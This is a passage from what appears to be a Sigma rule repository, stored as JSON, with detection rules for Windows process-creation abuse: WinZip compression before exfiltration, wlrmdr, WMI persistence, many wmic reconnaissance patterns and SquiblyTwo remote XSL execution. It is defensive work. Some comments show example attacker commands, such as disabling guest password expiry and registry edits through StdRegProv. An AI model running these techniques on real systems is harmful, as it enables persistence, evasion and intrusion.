    "content": "title: Compress Data and Lock With Password for Exfiltration With WINZIP\nid: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d\nstatus: test\ndescription: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nauthor: frack113\ndate: 2021-07-27\nmodified: 2022-12-25\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_winzip:\n        CommandLine|contains:\n            - 'winzip.exe'\n            - 'winzip64.exe'\n    selection_password:\n        CommandLine|contains: '-s\"'\n    selection_other:\n        CommandLine|contains:\n            - ' -min '\n            - ' -a '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wlrmdr_uncommon_child_process.yml",
    "content": "title: Wlrmdr.EXE Uncommon Argument Or Child Process\nid: 9cfc00b6-bfb7-49ce-9781-ef78503154bb\nstatus: experimental\ndescription: |\n    Detects the execution of \"Wlrmdr.exe\" with the \"-u\" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.\n    This detection also focuses on any uncommon child processes spawned from \"Wlrmdr.exe\" as a supplement for those that posses \"ParentImage\" telemetry.\nreferences:\n    - https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ\n    - https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/\nauthor: frack113, manasmbellani\ndate: 2022-02-16\nmodified: 2025-10-31\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent: # This selection is looking for processes spawned from wlrmdr using the \"-u\" flag\n        ParentImage|endswith: '\\wlrmdr.exe'\n    selection_child_img:\n        - Image|endswith: '\\wlrmdr.exe'\n        - OriginalFileName: 'WLRMNDR.EXE'\n    selection_child_cli_flags_s:\n        CommandLine|contains|windash: '-s '\n    selection_child_cli_flags_f:\n        CommandLine|contains|windash: '-f '\n    selection_child_cli_flags_t:\n        CommandLine|contains|windash: '-t '\n    selection_child_cli_flags_m:\n        CommandLine|contains|windash: '-m '\n    selection_child_cli_flags_a:\n        CommandLine|contains|windash: '-a '\n    selection_child_cli_flags_u:\n        CommandLine|contains|windash: '-u '\n    filter_main_winlogon:\n        ParentImage: 'C:\\Windows\\System32\\winlogon.exe'\n    filter_main_empty:\n        ParentImage:\n            - ''\n            - '-'\n    filter_main_null:\n        ParentImage: null\n    condition: selection_parent or (all of selection_child_* and not 1 of filter_main_*)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml",
    "content": "title: WMI Backdoor Exchange Transport Agent\nid: 797011dc-44f4-4e6f-9f10-a8ceefbe566b\nstatus: test\ndescription: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters\nreferences:\n    - https://twitter.com/cglyer/status/1182389676876980224\n    - https://twitter.com/cglyer/status/1182391019633029120\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-11\nmodified: 2023-02-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\EdgeTransport.exe'\n    filter_conhost:\n        Image: 'C:\\Windows\\System32\\conhost.exe'\n    filter_oleconverter:  # FP also documented in https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=18\n        Image|startswith: 'C:\\Program Files\\Microsoft\\Exchange Server\\'\n        Image|endswith: '\\Bin\\OleConverter.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmi_password_never_expire.yml",
    "content": "title: Password Set to Never Expire via WMI\nid: 7864a175-3654-4824-9f0d-f0da18ab27c0\nstatus: experimental\ndescription: |\n    Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration.\nreferences:\n    - https://www.huntress.com/blog/the-unwanted-guest\nauthor: \"Daniel Koifman (KoifSec)\"\ndate: 2025-07-30\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1047\n    - attack.t1098\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:   # Example command simulated:  wmic  useraccount where name='guest' set passwordexpires=false\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'useraccount'\n            - ' set '\n            - 'passwordexpires'\n            - 'false'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml",
    "content": "title: WMI Persistence - Script Event Consumer\nid: ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e\nstatus: test\ndescription: Detects WMI script event consumers\nreferences:\n    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nauthor: Thomas Patzke\ndate: 2018-03-07\nmodified: 2022-10-11\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image: C:\\WINDOWS\\system32\\wbem\\scrcons.exe\n        ParentImage: C:\\Windows\\System32\\svchost.exe\n    condition: selection\nfalsepositives:\n    - Legitimate event consumers\n    - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml",
    "content": "title: New ActiveScriptEventConsumer Created Via Wmic.EXE\nid: ebef4391-1a81-4761-a40a-1db446c0e625\nstatus: test\ndescription: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence\nreferences:\n    - https://twitter.com/johnlatwc/status/1408062131321270282?s=12\n    - https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-06-25\nmodified: 2023-02-14\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'ActiveScriptEventConsumer'\n            - ' CREATE '\n    condition: selection\nfalsepositives:\n    - Legitimate software creating script event consumers\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml",
    "content": "title: Potential Windows Defender Tampering Via Wmic.EXE\nid: 51cbac1e-eee3-4a90-b1b7-358efb81fa0a\nstatus: test\ndescription: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md\n    - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/\n    - https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/\nauthor: frack113\ndate: 2022-12-11\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1047\n    - attack.t1562\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_cli:\n        CommandLine|contains: '/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_process_creation.yml",
    "content": "title: New Process Created Via Wmic.EXE\nid: 526be59f-a573-4eea-b5f7-f0973207634d\nrelated:\n    - id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 # For suspicious process creation\n      type: derived\nstatus: test\ndescription: Detects new process creation using WMIC via the \"process call create\" flag\nreferences:\n    - https://www.sans.org/blog/wmic-for-incident-response/\n    - https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process\nauthor: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community\ndate: 2019-01-16\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\n    - car.2016-03-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'process'\n            - 'call'\n            - 'create'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_computersystem.yml",
    "content": "title: Computer System Reconnaissance Via Wmic.EXE\nid: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f\nstatus: test\ndescription: Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-08\nmodified: 2023-02-14\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1047\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: 'computersystem'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml",
    "content": "title: Hardware Model Reconnaissance Via Wmic.EXE\nid: 3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d\nstatus: test\ndescription: Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information\nreferences:\n    - https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/\n    - https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\n    - car.2016-03-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: 'csproduct'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_group.yml",
    "content": "title: Local Groups Reconnaissance Via Wmic.EXE\nid: 164eda96-11b2-430b-85ff-6a265c15bf32\nstatus: test\ndescription: |\n    Detects the execution of \"wmic\" with the \"group\" flag.\n    Adversaries may attempt to find local system groups and permission settings.\n    The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\n    Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nauthor: frack113\ndate: 2021-12-12\nmodified: 2023-02-14\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: ' group'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_hotfix.yml",
    "content": "title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE\nid: dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45\nstatus: test\ndescription: Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts\nreferences:\n    - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat\n    - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_cli:\n        CommandLine|contains: ' qfe'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml",
    "content": "title: Process Reconnaissance Via Wmic.EXE\nid: 221b251a-357a-49a9-920a-271802777cc0\nstatus: test\ndescription: Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: frack113\ndate: 2022-01-01\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: 'process'\n    filter_main_creation:\n        CommandLine|contains|all:\n            # Rule id 526be59f-a573-4eea-b5f7-f0973207634d for `wmic process call create #{process_to_execute}`\n            - 'call'\n            - 'create'\n    condition: all of selection* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml",
    "content": "title: Potential Product Reconnaissance Via Wmic.EXE\nid: 15434e33-5027-4914-88d5-3d4145ec25a9\nstatus: test\ndescription: Detects the execution of WMIC in order to get a list of firewall and antivirus products\nreferences:\n    - https://thedfirreport.com/2023/03/06/2022-year-in-review/\n    - https://www.yeahhub.com/list-installed-programs-version-path-windows/\n    - https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product\nauthor: Nasreddine Bencherchali\ndate: 2023-02-14\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: 'Product'\n    filter_main_call_operations:\n        # wmic /node:\"#{node}\" product where \"name like '#{product}%%'\" call uninstall\n        CommandLine|contains:\n            - ' uninstall'\n            - ' install'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml",
    "content": "title: Potential Product Class Reconnaissance Via Wmic.EXE\nid: e568650b-5dcd-4658-8f34-ded0b1e13992\nstatus: test\ndescription: |\n    Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products.\n    Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms.\n    This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.\nreferences:\n    - https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md\n    - https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1\n    - https://www.trendmicro.com/en_us/research/25/c/socgholishs-intrusion-techniques-facilitate-distribution-of-rans.html\nauthor: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2023-02-14\nmodified: 2025-03-17\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        # Example: wmic.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List\n        CommandLine|contains:\n            - 'AntiVirusProduct'\n            - 'AntiSpywareProduct'\n            - 'FirewallProduct'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispywware products.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml",
    "content": "title: Service Reconnaissance Via Wmic.EXE\nid: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae\nrelated:\n    - id: 68bcd73b-37ef-49cb-95fc-edc809730be6\n      type: similar\nstatus: test\ndescription: |\n    An adversary might use WMI to check if a certain remote service is running on a remote device.\n    When the test completes, a service information will be displayed on the screen if it exists.\n    A common feedback message is that \"No instance(s) Available\" if the service queried is not running.\n    A common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: 'service'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml",
    "content": "title: Uncommon System Information Discovery Via Wmic.EXE\nid: 9d5a1274-922a-49d0-87f3-8c653483b909\nrelated:\n    - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e\n      type: derived\nstatus: test\ndescription: |\n    Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\n    including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\n    and GPU driver products/versions.\n    Some of these commands were used by Aurora Stealer in late 2022/early 2023.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic\n    - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/\n    - https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar\n    - https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/\n    - https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/\n    - https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior\nauthor: TropChaud\ndate: 2023-01-26\nmodified: 2023-12-19\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wmic:\n        - Description: 'WMI Commandline Utility'\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_commands:\n        CommandLine|contains:\n            - 'LOGICALDISK get Name,Size,FreeSpace'\n            - 'os get Caption,OSArchitecture,Version'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml",
    "content": "title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE\nid: 68bcd73b-37ef-49cb-95fc-edc809730be6\nrelated:\n    - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b # PowerShell Variant\n      type: similar\n    - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae\n      type: similar\nstatus: test\ndescription: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts\nreferences:\n    - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py\n    - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2023-09-11\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' service get '\n            - 'name,displayname,pathname,startmode'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_volume.yml",
    "content": "title: System Disk And Volume Reconnaissance Via Wmic.EXE\nid: c79da740-5030-45ec-a2e0-479e824a562c\nrelated:\n    - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e\n      type: similar\nstatus: test\ndescription: |\n    An adversary might use WMI to discover information about the system, such as the volume name, size,\n    free space, and other disk information. This can be done using the 'wmic' command-line utility and has been\n    observed being used by threat actors such as Volt Typhoon.\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: Stephen Lincoln '@slincoln-aiq' (AttackIQ)\ndate: 2024-02-02\nmodified: 2025-10-20\ntags:\n    - attack.execution\n    - attack.discovery\n    - attack.t1047\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        - CommandLine|contains:\n              - ' volumename'\n              - ' logicaldisk'\n        - CommandLine|contains|all:\n              - 'path'\n              - 'win32_logicaldisk'\n        - CommandLine|contains|all:\n              - ' volume'\n              - ' list '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml",
    "content": "title: WMIC Remote Command Execution\nid: 7773b877-5abb-4a3e-b9c9-fd0369b59b00\nrelated:\n    - id: e42af9df-d90b-4306-b7fb-05c863847ebd\n      type: obsolete\n    - id: 09af397b-c5eb-4811-b2bb-08b3de464ebf\n      type: obsolete\nstatus: test\ndescription: Detects the execution of WMIC to query information on a remote system\nreferences:\n    - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-14\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|windash: '/node:'\n    filter_main_localhost:\n        CommandLine|contains:\n            - 'localhost'\n            - '127.0.0.1'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_service_manipulation.yml",
    "content": "title: Service Started/Stopped Via Wmic.EXE\nid: 0b7163dc-7eee-4960-af17-c0cd517f92da\nstatus: test\ndescription: Detects usage of wmic to start or stop a service\nreferences:\n    - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' service '\n            - ' call '\n        CommandLine|contains:\n            - 'stopservice'\n            - 'startservice'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml",
    "content": "title: Potential Remote SquiblyTwo Technique Execution\nid: 8d63dadf-b91b-4187-87b6-34a1114577ea\nrelated:\n    - id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32\n      type: similar\n    - id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d\n      type: similar\nstatus: test\ndescription: |\n    Detects potential execution of the SquiblyTwo technique that leverages Windows Management Instrumentation (WMI)\n    to execute malicious code remotely. This technique bypasses application whitelisting by using wmic.exe to process\n    malicious XSL (eXtensible Stylesheet Language) scripts that can contain embedded JScript or VBScript.\n    The attack typically works by fetching XSL content from a remote source (using HTTP/HTTPS) and executing it\n    with full trust privileges directly in memory, avoiding disk-based detection mechanisms. This is a common\n    LOLBin (Living Off The Land Binary) technique used for defense evasion and code execution.\nreferences:\n    - https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html\n    - https://twitter.com/mattifestation/status/986280382042595328 # Deleted\n    - https://atomicredteam.io/defense-evasion/T1220/\n    - https://lolbas-project.github.io/lolbas/Binaries/Wmic/\n    - https://x.com/byrne_emmy12099/status/1932346420226658668\nauthor: Markus Neis, Florian Roth, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2019-01-16\nmodified: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.t1047\n    - attack.t1220\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n        - Hashes|contains:  # Sysmon field hashes contains all types\n              - 'IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E'\n              - 'IMPHASH=37777A96245A3C74EB217308F3546F4C'\n              - 'IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206'\n              - 'IMPHASH=B12619881D79C3ACADF45E752A58554A'\n              - 'IMPHASH=16A48C3CABF98A9DC1BF02C07FE1EA00'\n    selection_cli:\n        CommandLine|contains|windash: '/format:'\n        CommandLine|contains:\n            - '://'\n            - '\\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_stdregprov_reg_modification.yml",
    "content": "title: Registry Manipulation via WMI Stdregprov\nid: c453ab7a-1f5c-4716-a3b4-dea8135fb43a\nstatus: experimental\ndescription: |\n    Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class.\n    This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe.\n    Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands.\nreferences:\n    - https://www.bitdefender.com/en-us/blog/businessinsights/shrinklocker-decryptor-from-friend-to-foe-and-back-again\n    - https://trustedsec.com/blog/command-line-underdog-wmic-in-action\n    - https://trustedsec.com/blog/wmi-for-script-kiddies\nauthor: Daniel Koifman (KoifSec)\ndate: 2025-07-30\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.t1047\n    - attack.t1112\n    - attack.t1012\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:   # Example command simulated:  WMIC  /NameSpace:\\\\root\\default Class StdRegProv Call CreateKey sSubKeyName=\"\"SOFTWARE\\Policies\\DeleteMe\"\"\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'call'\n            - 'stdregprov'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml",
    "content": "title: Suspicious WMIC Execution Via Office Process\nid: e1693bc8-7168-4eab-8718-cdcaa68a1738\nrelated:\n    - id: 438025f9-5856-4663-83f7-52f878a70a50\n      type: derived\n    - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a\n      type: obsolete\n    - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0\n      type: obsolete\n    - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5\n      type: obsolete\n    - id: 04f5363a-6bca-42ff-be70-0d28bf629ead\n      type: obsolete\nstatus: test\ndescription: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: Vadim Khrykov, Cyb3rEng\ndate: 2021-08-23\nmodified: 2023-02-14\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - 